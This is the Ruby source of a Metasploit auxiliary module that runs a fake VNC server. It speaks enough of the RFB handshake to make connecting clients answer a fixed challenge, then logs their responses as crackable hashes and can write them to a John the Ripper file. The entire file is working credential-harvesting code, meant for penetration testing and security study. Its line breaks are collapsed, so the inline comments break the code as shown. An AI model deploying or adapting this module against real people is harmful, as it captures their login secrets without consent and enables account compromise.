## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report def initialize super( 'Name' => 'Authentication Capture: VNC', 'Description' => %q{ This module provides a fake VNC service that is designed to capture authentication credentials. }, 'Author' => 'Patrik Karlsson patrik[at]cqure.net', 'License' => MSF_LICENSE, 'Actions' => [ [ 'Capture' ] ], 'PassiveActions' => [ 'Capture' ], 'DefaultAction' => 'Capture' ) register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 5900 ]), OptString.new('CHALLENGE', [ true, "The 16 byte challenge", "00112233445566778899AABBCCDDEEFF" ]), OptString.new('JOHNPWFILE', [ false, "The prefix to the local filename to store the hashes in JOHN format", nil ]) ], self.class) end def setup super @state = {} end def run if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{32})$/ @challenge = [ datastore['CHALLENGE'] ].pack("H*") else print_error("CHALLENGE syntax must match 00112233445566778899AABBCCDDEEFF") return end exploit() end def on_client_connect(c) @state[c] = { :name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :pass => nil, :chall => nil, :proto => nil } c.put "RFB 003.007\n" end def on_client_data(c) data = c.get_once return if not data if data =~ /^RFB (.*)\n$/ @state[c][:proto] = $1 if @state[c][:proto] == "003.007" # for the 003.007 protocol we say we support the VNC sectype # and wait for the server to acknowledge it, before we send the # challenge. c.put [0x0102].pack("n") # 1 sectype, unencrypted elsif @state[c][:proto] == "003.003" # for the 003.003 protocol we say we support the VNC sectype # and immediately send the challenge sectype = [0x00000002].pack("N") c.put sectype @state[c][:chall] = @challenge c.put @state[c][:chall] else c.close end # the challenge was sent, so this should be our response elsif @state[c][:chall] c.put [0x00000001].pack("N") c.close print_status("VNC LOGIN: #{@state[c][:name]} Challenge: #{@challenge.unpack('H*')[0]}; Response: #{data.unpack('H*')[0]}") hash_line = "$vnc$*#{@state[c][:chall].unpack("H*")[0]}*#{data.unpack('H*')[0]}" report_auth_info( :host => c.peerhost, :port => datastore['SRVPORT'], :sname => 'vnc_client', :user => "", :pass => hash_line, :type => "vnc_hash", :proof => hash_line, :source_type => "captured", :active => true ) if(datastore['JOHNPWFILE']) fd = ::File.open(datastore['JOHNPWFILE'] + '_vnc' , "ab") fd.puts hash_line fd.close end # we have got the protocol sorted out and have offered the VNC sectype (2) elsif @state[c][:proto] == "003.007" if ( data.unpack("C")[0] != 2 ) print_error("Error: #{@state[c][:name]} Client chose a sectype that was not offered! #{data.unpack("H*")}") c.close return end @state[c][:chall] = @challenge c.put @state[c][:chall] end end def on_client_close(c) @state.delete(c) end end